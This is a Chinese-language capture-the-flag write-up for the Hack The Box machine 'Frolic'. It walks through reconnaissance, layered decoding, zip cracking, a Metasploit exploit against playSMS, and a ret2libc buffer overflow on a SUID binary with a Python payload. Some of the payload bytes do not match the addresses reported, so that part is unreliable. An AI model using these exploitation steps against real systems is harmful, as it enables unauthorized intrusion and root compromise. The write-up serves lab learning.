Hack The Box Frolic WriteUp


这是一道PWN题,知识点在于Ret2LibC攻击,两篇不错的参考文档:
http://www.cis.syr.edu/~wedu/seed/Labs/Vulnerability/Return_to_libc/Return_to_libc.pdf
https://www.exploit-db.com/docs/english/28553-linux-classic-return-to-libc-&-return-to-libc-chaining-tutorial.pdf

1.在端口扫描上吃了小亏,看到139、445开放后就中断了扫描,结果搞了半天samba没有进展,重启扫描后才发现了9999端口,而渗透的起始点正是这个端口。
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
1880/tcp open http Node.js (Express middleware)
9999/tcp open http nginx 1.10.3 (Ubuntu)

2.通过浏览器访问,可以看到一个默认的nginx欢迎页面,很显然需要目录爆破了,利用dirbuster可以发现admin,test,dev,backup,loop和playsms目录。其中admin目录需要密码,backup页面提供了一组用户名密码,playsms是知名网站框架,同样需要用户名密码,下面一个目录一个目录寻找线索。先记录backup页面得到的账户:
user - admin
password - imnothuman


backup页面

3.在admin页面开始尝试破解登录密码,F12进入开发者模式后能发现一个诡异的现象,当填写好用户名密码并点击Login按钮后,页面没有发出任何的Post或Get报文,直接提示密码错,还剩两次机会。这说明用户凭据的校验是在前台完成的。
没有任何网络通信

查看网页源码,发现加载了login.js,在这段脚本里可以直接拿到明文密码
登录密码

4.登录后会拿到一段恼人的编码文件,这是0ok编码,利用这个网站可以直接翻译原文:
Nothing here check /asdiSIAJJ0QWE9JAS
asdiSIAJJ0QWE9JAS目录

进入/asdiSIAJJ0QWE9JAS目录,获得另一端编码,这回看起来像是base64。拷贝这段编码,利用echo "编码串" | base64 -d > decodefile将解码后的结果写入文件,发现这是一个zip压缩包。
base64

5.打开这个压缩包需要输入密码,利用fcrackzip对密码进行爆破,很快能拿到结果,密码就是password。
fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt decodefile

6.压缩包里保存了一个.php文件,查看后发现这是一串Hex编码,可以利用http://www.unit-conversion.info/texttools/hexadecimal/将它进行转码,转码后是另一串base64。

Hex2Text
而base64解码后的串是一串Brainfuck
Brainfuck

同样利用https://www.splitbrain.org/_static/ook/拿到明文:idkwhatispass

7.账户admin:idkwhatispass能够登录http://10.10.10.111:9999/playsms。针对知名网站框架的攻击,可以依赖漏洞。在msf平台中,利于模块 exploit/multi/http/playsms_uploadcsv_exec可以轻松的拿下shell,uset.txt就位于/home/ayush目录下。

palysms

8.现在面临的是权限提升问题。检查SUID文件,发现可疑程序/home/ayush/.binary/rop被设置了S位。
find / -user root -perm -4000 -exec ls -ldb {} ; > /tmp/ckprm
SUID

9.运行程序发现rop要求用户输入一段Message,这很可能是一道溢出题,通过溢出拿到root shell。要在目标上顺利执行溢出,需要关注以下问题:
*系统的地址随机化是否开启?0代表关闭 sysctl -a --pattern "randomize"
*添加环境变量SHELL='/bin/sh' ,有的不存在,有的是bash,而bash会默认取消继承的root特权
对于本题来说,地址随机关闭,需要利用export SHELL='/bin/sh'添加环境变量。
目标情况

10.攻击思路是,因为目前的系统和处理器都有数据执行保护,堆栈上不允许运行程序,所以shell code只能从已经的代码中拼凑。若想利用system('/bin/sh')弹出shell,则需要找到system的函数地址和/bin/sh字符串的位置。函数system可以在libc中搜索这是每个程序都会引用的库文件,/bin/sh字符串因为我们手动输入所以一定存在于环境变量的内存中,那么我们还要做的就是定位溢出点,将system地址和参数入站。
11.在libc中搜索系统函数可以利用以下脚本:
https://0xdeadbeef.info/code/libc-search.c
gcc无法在目标上直接运行,需要在kali编译后上传,注意kali是64位系统,目标是32位系统,编译指令如下:
apt-get update
apt-get install gcc-multilib g++-multilib
(可能错误:In file included from location.c:1:/usr/include/stdio.h:27:10: fatal error: bits/libc-header-start.h: 没有那个文件或目录)
gcc libc-search.c -o libc-search -lc -ldl -m32
运行结果如下:
system 0xb7e53da0
exit 0xb7e479d0 //非必需保证函数正常退出
/bin/sh 没有找到
找地址

我们还需要用简单的代码自己搜索"/bin/sh"的位置,运行结果位于地址bfffffe0处,这是SHELL的位置,/bin/sh应该还要退后6位。

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main()
{
  char* shell = getenv("SHELL");
  printf("%x\n", (unsigned int)shell);
}

12.利用脚本生成随机串,提交rop运行并定位溢出点,参考:
https://www.offensive-security.com/metasploit-unleashed/writing-an-exploit/
随机串生成:/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
步骤如下:
*利用pattern_create.rb生成随机字符串
*gdb跟踪调试
利用pattern_offset.rb定位溢出点

定位溢出点

13.构造POC,目前已经获得准确的溢出偏移,System函数地址,Exit函数地址以及"/bin/sh"字符串位置,接下来要做的就是将他们组合起来,利用溢出点把它们压入栈中:
POC:52位字符串 + System函数地址 + Exit函数地址 + "/bin/sh"字符串地址
POC: `python -c 'print "A"
52 + "\x0a\x3d\xe5\b7" + "\x0d\x79\xe4\b7" + "\xe6\xff\xff\xbf" (注意地址的小端点格式)
poc运行结果
可以看出,sh已经被成功调用,但是传入参数有误,说明/bin/sh地址没有正确找到,这时可以适当放宽搜索范围在bfffffe0前后10位调整poc即bffffff0 - bfffffd0。最后可以在bfffffd8处准确找到/bin/sh字符串并成功弹出shell。
85d3fdf03f969892538ba9a731826222

推荐阅读更多精彩内容